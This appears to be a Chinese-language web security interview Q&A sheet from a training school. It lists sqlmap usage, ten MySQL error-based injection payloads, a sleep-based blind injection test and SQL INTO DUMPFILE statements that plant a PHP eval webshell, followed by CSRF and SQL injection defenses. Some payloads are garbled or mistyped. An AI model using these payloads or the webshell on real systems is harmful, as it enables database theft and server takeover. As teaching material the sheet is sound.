1、sqlmap,怎么對一個注入點注入?
1)如果是 get 型號,直接,sqlmap -u "諸如點網(wǎng)址".
2) 如果是 post 型諸如點,可以 sqlmap -u "注入點網(wǎng)址” --data="post 的參數(shù)"
3)如果是 cookie,X-Forwarded-For 等,可以訪問的時候,用 burpsuite 抓包,注入處用號替換,放到文件里,然后 sqlmap -r "文件地址"
2、sql 注入的幾種類型?
1)報錯注入
2)bool 型注入
3)延時注入
4)寬字節(jié)注入
3、報錯注入的函數(shù)有哪些?10 個
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】2)通過 floor 報錯 向下取整 3)
+and
updatexml(1, concat(0x7e,(secect @@version),0x7e),1)4).geometrycollection()select from
test
where id=1 and geometrycollection((select from(selectfrom(select
user())a)b));5).multipoint()select from test where id=1 and
multipoint((select from(select
from(select
user())a)b));6).polygon()select from test where
id=1 and polygon((select
from(select
from(select user())a)b));7).multipolygon()select from test where id=1 and
multipolygon((select from(select from(select user())a)b));8).linestring()select from test
where id=1 and linestring((select from(select
from(select
user())a)b));9).multilinestring()select from
test where id=1 and multilinestring((select
from(select from(select user())a)b));10).exp()select from test where id=1 and exp(~(select
* from(select user())a));
4、延時注入如何來判斷?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
5、如何拿一個網(wǎng)站的 webshell?
上傳,后臺編輯模板,sql 注入寫文件,命令執(zhí)行,代碼執(zhí)行, 一些已經(jīng)爆出的 cms 漏洞,比如 dedecms 后臺可以直接建立腳本文件,wordpress 上傳插件包含腳本文件 zip 壓縮包等
6、sql 注入寫文件都有哪些函數(shù)?
select '一句話' into
outfile '路徑'select '一句話' into dumpfile '路徑'select '
eval($_POST[1]) ?>'
into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
7、如何防止 CSRF?
1,驗證 referer
2,驗證 token
8、owasp 漏洞都有哪些?
1)SQL 注入防護方法:
2)失效的身份認證和會話管理
3)跨站腳本攻擊 XSS
4)直接引用不安全的對象
5)安全配置錯誤
6)敏感信息泄露
7)缺少功能級的訪問控制
8)跨站請求偽造 CSRF
9)使用含有已知漏洞的組件
9、未驗證的重定向和轉(zhuǎn)發(fā)49、SQL 注入防護方法?
1)使用安全的 API
2)對輸入的特殊字符進行 Escape 轉(zhuǎn)義處理
3)使用白名單來規(guī)范化輸入驗證方法
4)對客戶端輸入進行控制,不允許輸入 SQL 注入相關(guān)的特殊字符
5)服務(wù)器端在提交數(shù)據(jù)庫進行 SQL 查詢之前,對特殊字符進行過濾、轉(zhuǎn)義、替換、刪除。
更多關(guān)于網(wǎng)絡(luò)安全培訓的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務(wù)經(jīng)驗,采用全程面授高品質(zhì)、高體驗培養(yǎng)模式,擁有國內(nèi)一體化教學管理及學員服務(wù),助力更多學員實現(xiàn)高薪夢想。